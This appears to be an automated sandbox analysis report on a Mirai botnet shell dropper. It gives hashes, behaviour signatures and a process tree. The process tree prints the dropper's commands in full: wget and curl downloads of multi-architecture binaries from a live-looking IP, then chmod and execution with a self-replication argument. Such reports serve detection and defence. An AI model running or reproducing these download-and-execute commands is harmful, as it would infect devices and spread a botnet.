Analysis

  • max time kernel
    136s
  • max time network
    148s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags
    arch:mipsel
    image:debian9-mipsel-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    08/03/2025, 14:44

General

  • Target

    e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh

  • Size

    2KB

  • MD5

    6aea9de4b1853e6a5cea8ad020f48398

  • SHA1

    20e44372765f05e6899aa9bd7e4d9ff64f59c2f7

  • SHA256

    e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f

  • SHA512

    4cb78d553f9ae66e591534a047163ba9db0e54261266c700be091b4ddfe773de2e194f3b80916d40830d1d26f6a76912191fd01858922599fa2b88ca0c70d5a2

Malware Config

Extracted

Family

mirai

Botnet

DEMONS

Extracted

Family

mirai

Botnet

DEMONS

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 13 IoCs
  • Modifies Watchdog functionality 1 TTPs 22 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 10 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Writes file to system bin folder 11 IoCs
  • Changes its process name 11 IoCs
  • Reads system network configuration 1 TTPs 10 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 27 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh
    /tmp/e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:711
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.x86
      2⤵
      • Writes file to tmp directory
      PID:715
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:731
    • /bin/cat
      cat uYtea.x86
      2⤵
      PID:740
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:741
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      PID:742
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:744
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.mips
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:746
    • /bin/cat
      cat uYtea.mips
      2⤵
      • System Network Configuration Discovery
      PID:747
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.mips uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:748
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      PID:749
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.mpsl
      2⤵
      • Writes file to tmp directory
      PID:751
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.mpsl
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:752
    • /bin/cat
      cat uYtea.mpsl
      2⤵
      PID:753
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.mips uYtea.mpsl uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:754
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Changes its process name
      PID:755
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.arm
      2⤵
      • Writes file to tmp directory
      PID:757
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.arm
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:759
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.arm uYtea.mips uYtea.mpsl uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:761
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:762
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.arm5
      2⤵
      • Writes file to tmp directory
      PID:810
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.arm5
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:811
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.arm uYtea.arm5 uYtea.mips uYtea.mpsl uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:813
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:814
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.arm6
      2⤵
      • Writes file to tmp directory
      PID:820
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:821
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.mips uYtea.mpsl uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:829
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:830
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.arm7
      2⤵
      • Writes file to tmp directory
      PID:856
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.arm7
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:858
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:860
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:861
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.ppc
      2⤵
      • Writes file to tmp directory
      PID:863
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.ppc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:865
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:867
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:868
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.m68k
      2⤵
      • Writes file to tmp directory
      PID:870
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.m68k
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:872
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:874
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:875
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.sh4
      2⤵
      • Writes file to tmp directory
      PID:877
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.sh4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:879
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:881
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:882
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.spc
      2⤵
      • Writes file to tmp directory
      PID:884
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.spc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:886
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:888
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:889
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.arc
      2⤵
      • Writes file to tmp directory
      PID:891
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.arc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:893
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x
      2⤵
      • File and Directory Permissions Modification
      PID:895
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:896
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.x86_64
      2⤵
      • Writes file to tmp directory
      PID:898
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.x86_64
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:900
    • /bin/chmod
      chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 uYtea.x86_64 x
      2⤵
      • File and Directory Permissions Modification
      PID:902
    • /tmp/x
      ./x SSH.Selfrep
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:903

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/uYtea.x86

    Filesize

    54KB

    MD5

    e8ee0839bb7869765d80e4280d585222

    SHA1

    e0aa7ad73b70d2fbd0f8f4ca2d5ca417c6e36538

    SHA256

    34537b3ae42d5d93060f42ccd019a8e976290a01b0380e6688a2dfa1515cd1a6

    SHA512

    a3570f2617a4ed149c1a8a8a396a2d0522c09551ab54ef7c7b882c71b66ac3cd9246e552b6acaceeb2585c337bee9e471af729dee5a08f9a491ab14a6c72f02b

  • /tmp/x

    Filesize

    75KB

    MD5

    e22278172a0f989dcd639152d1f7bdda

    SHA1

    5ef82abd4a65994779ed81263e4495aa2a1fc0a0

    SHA256

    c21056260e2db4b9f6dc025dfa6286ef2865b3b4f43a4633a7653499b63f20d3

    SHA512

    686e0967c54a58d086e279d2b3d3aedbc604221b802c2fbf2ec4d55acc681eefcbf1edd236828c257350d5f75694d0dd4a98d35c8e7fa247ebe1dc4bc211e74e

  • /tmp/x

    Filesize

    75KB

    MD5

    d40b08390f13aa89c14e0fedff56e41f

    SHA1

    7f5f215fef320e6677f9490dff7732d46f157af9

    SHA256

    10a4c1b8a7106008acb65a31ab3d078f7b056eb30e4397f8b7a09b39855d23ea

    SHA512

    e385eb0f4a06f0264bc5f0b95ffb83673834e3ffb267f947c264f2ccb5017bdee416b6e7c158ed1ef066d14f26eddc7426ab0313fc4de4948fbefb51637be7a6